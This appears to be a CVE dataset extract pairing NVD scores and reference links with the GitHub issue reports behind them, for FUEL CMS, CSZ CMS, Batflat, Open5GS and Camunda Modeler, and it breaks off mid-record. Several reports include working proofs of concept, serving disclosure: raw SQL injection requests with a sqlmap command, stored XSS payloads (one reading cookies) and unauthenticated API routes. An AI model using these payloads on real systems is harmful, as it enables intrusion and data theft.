"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"daylightstudio",
"FUEL-CMS"
] | General users can modify the administrator password and account infomation vulnerability .
for example:
The account test123 can chanage the admin password!!!
step 1:
log in test123:
<img width="958" alt="1" src="https://user-images.githubusercontent.com/12816285/85488214-81abda00-b600-11ea-9b6e-b8c0551322df.png">
Step 2:
edit Any non-administrator account:
<img width="705" alt="2" src="https://user-images.githubusercontent.com/12816285/85488408-d3546480-b600-11ea-9307-ead12b54c763.png">
<img width="662" alt="3" src="https://user-images.githubusercontent.com/12816285/85488485-f41cba00-b600-11ea-838d-f1251856ee96.png">
Step 3:
Save the chanage:
<img width="641" alt="4" src="https://user-images.githubusercontent.com/12816285/85488606-2d552a00-b601-11ea-855a-cf82d5189bf4.png">
Then Intercept the packets and chanage the "id" and "__fuel_id__" value 1
<img width="492" alt="5" src="https://user-images.githubusercontent.com/12816285/85489127-211d9c80-b602-11ea-9b18-0adaf8ece8b5.png">
<img width="516" alt="6" src="https://user-images.githubusercontent.com/12816285/85489142-2549ba00-b602-11ea-86ea-fb0bc4edf57e.png">
Success :
<img width="705" alt="7" src="https://user-images.githubusercontent.com/12816285/85489184-35619980-b602-11ea-97a9-a6bf6e3c1240.png">
Step 4:
log in admin use new password :
<img width="942" alt="8" src="https://user-images.githubusercontent.com/12816285/85489385-7f4a7f80-b602-11ea-9fb1-158792134c72.png">
<img width="859" alt="9" src="https://user-images.githubusercontent.com/12816285/85489564-c33d8480-b602-11ea-83a7-9e945286141c.png">
<img width="947" alt="10" src="https://user-images.githubusercontent.com/12816285/85489667-e9fbbb00-b602-11ea-8537-ac7baadf6299.png">
| General users can modify the administrator password vulnerability | https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/560/comments | 1 | 2020-06-24T02:12:08Z | 2020-07-02T15:18:03Z | https://github.com/daylightstudio/FUEL-CMS/issues/560 | 644,263,989 | 560 | 1,744 |
CVE-2020-24791 | 2021-03-10T14:15:12.547 | FUEL CMS 1.4.8 allows SQL injection via the 'fuel_replace_id' parameter in pages/replace/1. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/daylightstudio/FUEL-CMS/issues/561"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/leerina/vulnerability/blob/master/Fuel%20CMS%201.4.8%20SQLi%20vulnerability.txt"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.exploit-db.com/exploits/48778"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/daylightstudio/FUEL-CMS/issues/561"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/leerina/vulnerability/blob/master/Fuel%20CMS%201.4.8%20SQLi%20vulnerability.txt"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.exploit-db.com/exploits/48778"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.8:*:*:*:*:*:*:*",
"matchCriteriaId": "AB4A4A9E-CC08-4A74-A807-92843A9912E8",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/daylightstudio/FUEL-CMS/issues/561 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"daylightstudio",
"FUEL-CMS"
] | FUEL CMS 1.4.8 allows SQL Injection via parameter 'fuel_replace_id' in pages/replace/1
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
POC:
POST /FUEL-CMS-1.4.8/fuel/pages/replace/1?inline=1 HTTP/1.1
Host: 192.168.1.12
Content-Length: 347
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.12
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygI1zKZoBINTcL87g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.12/FUEL-CMS-1.4.8/fuel/pages/replace/1?lang=english
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: fuel_ac82b68172fd46789948eb8e66216180=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22language%22%3Bs%3A0%3A%22%22%3B%7D; fuel_ui_ac82b68172fd46789948eb8e66216180=%257B%2522leftnav_h3%2522%253A%25220%257C0%257C0%257C0%2522%252C%2522fuel_pages_items%2522%253A%2522list%2522%252C%2522tabs_pages_create%2522%253A%25220%2522%252C%2522fuel_navigation_items%2522%253A%2522list%2522%252C%2522tabs_navigation_create%2522%253A%25220%2522%252C%2522tabs_pages_edit_1%2522%253A%25220%2522%257D; ci_session=db8df72tccrt8vnr2uaqnckv5ak4n135
Connection: close
------WebKitFormBoundarygI1zKZoBINTcL87g
Content-Disposition: form-data; name="fuel_replace_id"
11%27
------WebKitFormBoundarygI1zKZoBINTcL87g
Content-Disposition: form-data; name="Submit"
Submit
------WebKitFormBoundarygI1zKZoBINTcL87g
Content-Disposition: form-data; name="fuel_inline"
1
------WebKitFormBoundarygI1zKZoBINTcL87g--
**Exploiting Step1. Burpsuite request payload:**
In Burpsuite intercept the request from one of the affected pages with 'fuel_replace_id' parameter and save it like 33.txt
Then run SQLmap to extract the data from the database:
----------------------
POST /FUEL-CMS-1.4.8/fuel/pages/replace/1?inline=1 HTTP/1.1
Host: 192.168.1.12
Content-Length: 347
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.12
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygI1zKZoBINTcL87g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.12/FUEL-CMS-1.4.8/fuel/pages/replace/1?lang=english
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: fuel_ac82b68172fd46789948eb8e66216180=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22language%22%3Bs%3A0%3A%22%22%3B%7D; fuel_ui_ac82b68172fd46789948eb8e66216180=%257B%2522leftnav_h3%2522%253A%25220%257C0%257C0%257C0%2522%252C%2522fuel_pages_items%2522%253A%2522list%2522%252C%2522tabs_pages_create%2522%253A%25220%2522%252C%2522fuel_navigation_items%2522%253A%2522list%2522%252C%2522tabs_navigation_create%2522%253A%25220%2522%252C%2522tabs_pages_edit_1%2522%253A%25220%2522%257D; ci_session=db8df72tccrt8vnr2uaqnckv5ak4n135
Connection: close
------WebKitFormBoundarygI1zKZoBINTcL87g
Content-Disposition: form-data; name="fuel_replace_id"
11*
------WebKitFormBoundarygI1zKZoBINTcL87g
Content-Disposition: form-data; name="Submit"
Submit
------WebKitFormBoundarygI1zKZoBINTcL87g
Content-Disposition: form-data; name="fuel_inline"
1
------WebKitFormBoundarygI1zKZoBINTcL87g--
**Exploiting Setp2 use sqlmap and exploit it.**
python sqlmap.py -r 33.txt --dbs
<img width="844" alt="1" src="https://user-images.githubusercontent.com/12816285/90610441-fd5c8880-e237-11ea-9616-1130cd4ab3fa.png">
<img width="430" alt="33" src="https://user-images.githubusercontent.com/12816285/90610520-1d8c4780-e238-11ea-85e8-b1605cde72f6.png">
| FUEL CMS 1.4.8 allows SQL Injection via parameter 'fuel_replace_id' in pages/replace/1 | https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/561/comments | 0 | 2020-08-19T08:22:40Z | 2020-09-23T16:35:29Z | https://github.com/daylightstudio/FUEL-CMS/issues/561 | 681,646,072 | 561 | 1,745 |
CVE-2020-28705 | 2021-03-10T14:15:12.623 | FUEL CMS 1.4.13 contains a cross-site request forgery (CSRF) vulnerability that can delete a page via a post ID to /pages/delete/3. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/daylightstudio/FUEL-CMS/commit/fbf2d59215800f05d4359e8f984d5680d62f0f3b"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/daylightstudio/FUEL-CMS/issues/576"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/daylightstudio/FUEL-CMS/commit/fbf2d59215800f05d4359e8f984d5680d62f0f3b"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/daylightstudio/FUEL-CMS/issues/576"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.13:*:*:*:*:*:*:*",
"matchCriteriaId": "22D4ECFB-0516-4086-83DA-AA5F1EE17D26",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"352"
] | 352 | https://github.com/daylightstudio/FUEL-CMS/issues/576 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"daylightstudio",
"FUEL-CMS"
] | In /pages/delete/3 Cross-site request forgery (CSRF) vulnerability The Attacker can use this vulnerability to delete random pages!
<img width="536" alt="222png" src="https://user-images.githubusercontent.com/68934938/98192825-c0f71980-1f56-11eb-8c11-efb7a60f17ad.png">
POC:

| FUEL-CMS V1.4.13 Cross-site request forgery (CSRF) vulnerability | https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/576/comments | 0 | 2020-11-05T02:54:39Z | 2021-05-14T13:59:33Z | https://github.com/daylightstudio/FUEL-CMS/issues/576 | 736,567,837 | 576 | 1,746 |
CVE-2021-3224 | 2021-03-10T14:15:12.703 | A stored cross-site scripting (XSS) vulnerability in cszcms 1.2.9 exists in /admin/pages/new via the content parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cskaza/cszcms/issues/28"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://www.cszcms.com/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cskaza/cszcms/issues/28"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://www.cszcms.com/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cszcms:csz_cms:1.2.9:*:*:*:*:*:*:*",
"matchCriteriaId": "0068F78B-C701-4A09-8978-A0D07EE14906",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/cskaza/cszcms/issues/28 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"cskaza",
"cszcms"
] | Hi,@cskaza
I found a Stored XSS Vulnerability In /admin/pages/new (release/1.2.9)
In content page ,The content Parameter are not filtered:


POC:a”><img src=x onerror=alert(1);>





Author:leerina | Stored XSS Vulnerability In /admin/pages/new (release/1.2.9) | https://api.github.com/repos/cskaza/cszcms/issues/28/comments | 8 | 2021-01-13T02:19:45Z | 2021-12-04T09:23:31Z | https://github.com/cskaza/cszcms/issues/28 | 784,731,354 | 28 | 1,747 |
CVE-2021-28122 | 2021-03-10T15:15:12.930 | A request-validation issue was discovered in Open5GS 2.1.3 through 2.2.x before 2.2.1. The WebUI component allows an unauthenticated user to use a crafted HTTP API request to create, read, update, or delete entries in the subscriber database. For example, new administrative users can be added. The issue occurs because Express is not set up to require authentication. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/open5gs/open5gs/compare/v2.2.0...v2.2.1"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/open5gs/open5gs/issues/837"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/open5gs/open5gs/pull/838"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/open5gs/open5gs/releases"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/open5gs/open5gs/compare/v2.2.0...v2.2.1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/open5gs/open5gs/issues/837"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/open5gs/open5gs/pull/838"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/open5gs/open5gs/releases"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:*",
"matchCriteriaId": "34A2C732-AE91-433F-9A9E-3B28F7503E47",
"versionEndExcluding": null,
"versionEndIncluding": "2.2.0",
"versionStartExcluding": null,
"versionStartIncluding": "2.1.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"306"
] | 306 | https://github.com/open5gs/open5gs/issues/837 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"open5gs",
"open5gs"
] | An unauthenticated user can utilize information provided by the login page of the webui component to craft HTTP requests that will allow that user to create, read, update, and delete entries in the subscriber database. This includes the ability to add administrative users, add/modify/delete subscribers, and add/modify/delete profiles.
Properly crafted HTTP GET and DELETE requests with empty bodies will cause data to be returned or deleted on the following routes:
http://<deploymentip>:3000/api/db/account
http://<deploymentip>:3000/api/db/profile
http://<deploymentip>:3000/api/db/subscriber
http://<deploymentip>:3000/api/db/account/<username>
http://<deploymentip>:3000/api/db/profile/<profile_id>
http://<deploymentip>:3000/api/db/subscriber/<imsi_number>
Properly crafted HTTP POST,PUT and PATCH requests with properly crafted bodies will cause data to be inserted or updated on the following routes:
http://<deploymentip>:3000/api/db/account
http://<deploymentip>:3000/api/db/profile
http://<deploymentip>:3000/api/db/subscriber
http://<deploymentip>:3000/api/db/account/<username>
http://<deploymentip>:3000/api/db/profile/<profile_id>
http://<deploymentip>:3000/api/db/subscriber/<imsi_number>
This is caused by the configuration of express js in [index.js](https://github.com/open5gs/open5gs/blob/main/webui/server/routes/index.js). This should be updated to correctly validate the user making the API calls. | Authentication Bypass in Webui | https://api.github.com/repos/open5gs/open5gs/issues/837/comments | 1 | 2021-03-10T13:18:52Z | 2023-03-21T22:35:28Z | https://github.com/open5gs/open5gs/issues/837 | 827,727,045 | 837 | 1,748 |
CVE-2021-26776 | 2021-03-11T17:15:12.843 | CSZ CMS 1.2.9 is affected by a cross-site scripting (XSS) vulnerability in multiple pages through the field name. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cskaza/cszcms/issues/29"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cskaza/cszcms/issues/29"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cszcms:csz_cms:1.2.9:*:*:*:*:*:*:*",
"matchCriteriaId": "0068F78B-C701-4A09-8978-A0D07EE14906",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/cskaza/cszcms/issues/29 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"cskaza",
"cszcms"
] | Multiple Stored XSS Cross-Site Scripting on CSZ CMS 1.2.9
Login with editor account with rights to Forms Builder, XML Plugin Widgets, Statistic for link, Banner Manager, Carousel Widget, Pages Content, Language, Plugin Manager.
```
Forms Builder
- Add or edit Forms Builder:
Forms Name: <noframes><p title="</noframes><svg/onload=alert(document.domain)>">
```
**POC**

```
XML Plugin Widgets
- Add or edit Widgets:
Widget Name: <noframes><p title="</noframes><svg/onload=alert(document.domain)>">
```
**POC**

```
Statistic for link
- Add New Link:
URL: <noframes><p title="</noframes><svg/onload=alert(document.domain)>">```
```
**POC**

```
Banner Manager
- Add New Banner :
Banner Name: <noframes><p title="</noframes><svg/onload=alert(1)>">
```
**POC**

```
Carousel Widget
- Add new Carousel:
Carousel Name: <noframes><p title="</noframes><svg/onload=alert('xss')>">
```
**POC**

```
Pages Content
- Add or edit Pages Content:
Pages Name: Abouts Us<noframes><p title="</noframes><svg/onload=alert&#40;document.domain&#41;>">
```
**POC**

```
Language
- Add new Language:
Language Name: <noframes><p title="</noframes><svg/onload=alert('xss')>">
```
**POC**

```
Plugin Manager
- Add new Category(/admin/plugin/article/category):
Category Name: <noframes><p title="</noframes><svg/onload=alert(document.domain)>">
```
**POC**

| Multiple Stored XSS Cross-Site Scripting on CSZ CMS 1.2.9 | https://api.github.com/repos/cskaza/cszcms/issues/29/comments | 2 | 2021-02-02T01:16:34Z | 2021-11-10T08:58:04Z | https://github.com/cskaza/cszcms/issues/29 | 798,839,047 | 29 | 1,749 |
CVE-2021-27677 | 2021-03-11T17:15:12.907 | Cross-site scripting (XSS) vulnerability in Galleries in Batflat CMS 1.3.6 allows remote attackers to inject arbitrary web script or HTML via the field name. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/sruupl/batflat/issues/105"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/sruupl/batflat/issues/105"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:batflat:batflat:1.3.6:*:*:*:*:*:*:*",
"matchCriteriaId": "CCD502D1-2B27-4BC5-9DF2-C71F42212D85",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/sruupl/batflat/issues/105 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"sruupl",
"batflat"
] | Multiple Stored XSS Cross-Site Scripting on Batflat CMS 1.3.6
Login with editor account with rights to Navigation, Galleries, Snippets
<h2>Navigation</h2>
```
Add link
payload: "><img src=x onerror=alert(document.cookie)>
```

Code being executed:

<h2>Galleries</h2>
```
Add gallery
payload: mlem"><svg/onload=alert(1)>
```

Code being executed:

<h2>Snippets</h2>
```
Add Snippets
payload: mlem"><svg/onload=alert("TuongNC")>
```

Code being executed:

| Multiple Stored XSS Cross-Site Scripting on Batflat CMS 1.3.6 | https://api.github.com/repos/sruupl/batflat/issues/105/comments | 1 | 2021-02-22T11:07:28Z | 2021-07-31T15:03:30Z | https://github.com/sruupl/batflat/issues/105 | 813,396,789 | 105 | 1,750 |
CVE-2021-28154 | 2021-03-11T22:15:12.857 | Camunda Modeler (aka camunda-modeler) through 4.6.0 allows arbitrary file access. A remote attacker may send a crafted IPC message to the exposed vulnerable ipcRenderer IPC interface, which manipulates the readFile and writeFile APIs. NOTE: the vendor states "The way we secured the app is that it does not allow any remote scripts to be opened, no unsafe scripts to be evaluated, no remote sites to be browsed. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/camunda/camunda-modeler/issues/2143"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
